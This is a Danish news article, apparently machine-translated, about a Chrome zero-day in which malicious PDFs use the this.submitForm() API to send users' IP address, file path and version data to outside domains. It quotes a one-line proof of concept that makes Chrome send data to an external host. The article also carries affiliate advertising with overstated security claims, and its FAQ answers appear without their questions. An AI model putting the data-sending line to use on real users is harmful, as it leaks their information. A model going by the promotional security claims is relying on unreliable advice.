- EdgeSpot opdagede en spændende nul-dags sårbarhed, der udnyttede PDF-dokumenter i Chrome.
- Det her sårbarhed kan skade dig ved at høste de følsomme data på din pc.
- Udforsk vores Web & Cloud-side for mere indsigt i andre værktøjer og tjenester.
- Hvis du er interesseret i browsere, giver vi masser af oplysninger om dem i vores Browsers Hub.
Gør alle dine dokumenter tilgængelige og sikre ved hjælp af Adobe Acrobat Reader. Dette dokumentstyringsværktøj giver dig også mulighed for at e-signere og oprette officielle formularer for at spare din tid på arbejdet. Hent det til din pc, så kan du:
- Åbn, udskriv og rediger alle dine PDF-filer og andre filtyper
- Udfyld PDF-formularer nemmere
- Hold dine vigtige dokumenter krypteret
Få alle apps til en speciel pris!
Verdens Nr.1 dokumenthåndteringssoftware er nu til en god pris, så skynd dig!
Udnyttelse afsløringstjeneste EdgeSpot opdagede en spændende Chrome nul-dags sårbarhed, der udnytter PDF-dokumenter.
Sårbarheden gør det muligt for angribere at høste følsomme data ved hjælp af ondsindede PDF-dokumenter, der er åbnet i Chrome.
Så snart offeret åbner de respektive PDF-filer i Google Chrome, begynder et ondsindet program at arbejde i baggrunden ved at indsamle brugerdata.
Dataene videresendes derefter til den eksterne server, der styres af hackerne. Du undrer dig måske over, hvilke data der suges af angriberne, de målretter mod følgende data på din pc:
- IP-adresse
- Fuld sti til PDF-filen på systemet
- OS- og Chrome-versioner
Pas på malware-ridne PDF-filer
Eksperter fik øje på det ene af de to domæner readnotify [.] com eller burpcollaborator [.] net modtog dataene.
De afslørede, at angriberne bruger this.submitForm () PDF Javascript API til at indsamle de følsomme oplysninger fra brugerne.
Vi testede det med en minimal PoC, et simpelt API-opkald som this.submitForm (‘ http://google.com/test’) får Google Chrome til at sende de personlige data til google.com.
Denne Chrome-fejl blev udnyttet af to forskellige sæt ondsindede PDF-filer, som begge blev cirkuleret i henholdsvis oktober 2017 og september 2018.
Især kan de indsamlede data bruges af angriberne til at finjustere angreb i fremtiden. Rapporter antyder, at den første batch af filer blev kompileret ved hjælp af ReadNotify's PDF-sporingstjeneste.
Brugere kan bruge tjenesten til at holde styr på brugervisningerne. EdgeSpot har ikke delt nogen detaljer vedrørende arten af det andet sæt PDF-filer.
Hurtigt tip: Skift din browser til Opera
I disse urolige tider bliver vi angrebet med malware, phishing og trojanere ved hvert trin, så vi bliver meget mere opmærksomme og forbliver beskyttede.
Og da dette er et specifikt problem for Chrome, kan du undgå denne trussel og alle andre med en sikkerhedsorienteret browser som Opera.
Denne browser leveres med en indbygget annonceblokker, der ikke kun rydder sådanne distraktioner, men også blokerer analyseskripts, sporingspixels og metoder til at indsamle dine data.
Og hvis du vil være helt sikker på, at du holder dig væk fra enhver fare, skal du komme bag den indbyggede VPN tjeneste, der er 100% gratis at bruge i ubegrænset tid.
Opera
Opera tilbyder den perfekte trusselsbeskyttelse med den indbyggede ad-blocker og VPN-tjeneste gratis!
Besøg webstedet
Hvordan kan jeg forblive beskyttet mod PDF-sårbarheder?
Download Adobe Acrobat PRO
Adobe og Chrome passer godt sammen, når det gælder håndtering af PDF-filer. Ved at installere Adobe Extension til Chrome kan du gennemgå og manipulere PDF-filer efter eget ønske uden at forlade din yndlingsbrowser.
På trods af sin robuste struktur opdages malware muligvis ikke i PDF-filer, hvis du bruger standardversionen af Reader.
Den professionelle version anbefales for at garantere din beskyttelse og holde dine data væk fra hackere.
Selvom det ikke er gratis, er prisen, du betaler, temmelig lille for den overflod af ekstra funktioner, du vil nyde, inklusive den forbedrede sikkerhed i dine PDF-filer.
Der er også en 7-dages gratis prøveperiode inkluderet, så du kan få en smag af den fulde Pro-oplevelse, før du foretager købet.
Adobe Acrobat PRO
Hold dig væk fra malware ved at downloade Adobe Acrobat PRO. Det har masser af flere funktioner end den gratis version og holder dine data sikre.
Besøg webstedet
Hvis du vil være sikker, mens du surfer på internettet, skal du få et fuldt dedikeret værktøj til at sikre dit netværk. Installer privat internetadgang nu og sikr dig selv. Det beskytter din pc mod angreb under browsing, maskerer din IP-adresse og blokerer al uønsket adgang.
Exploit-detektionstjenesten EdgeSpot ønskede at advare Chrome-brugere om de potentielle risici, fordi patch ikke forventedes frigivet i den nærmeste fremtid.
EdgeSpot rapporterede til Google om sårbarheden sidste år, og virksomheden lovede at frigive en patch i slutningen af april.
Du kan dog overveje at bruge en midlertidig løsning på problemet ved at se de modtagne PDF-dokumenter lokalt ved hjælp af en anden læserapp.
Alternativt kan du også åbne dine PDF-dokumenter i Chrome ved at afbryde dine systemer fra internettet.
Ofte stillede spørgsmål
Ja det gør. Men hvis du vil have et bredere udvalg, udforske vores topvalg til Chromeprivatliv udvidelser i denne komplette guide.
Ther er mange udvidelser, der tillader det PDF-filer forarbejdning. Kontrollere ud vores fremragende guide om de bedste PDF-udvidelser til Chrome.
Det gør det ikke, men du kan aktivere det hurtigt. Her er vores omfattende guide om, hvordan man aktiverer QR-kodegeneratoren i Chrome.
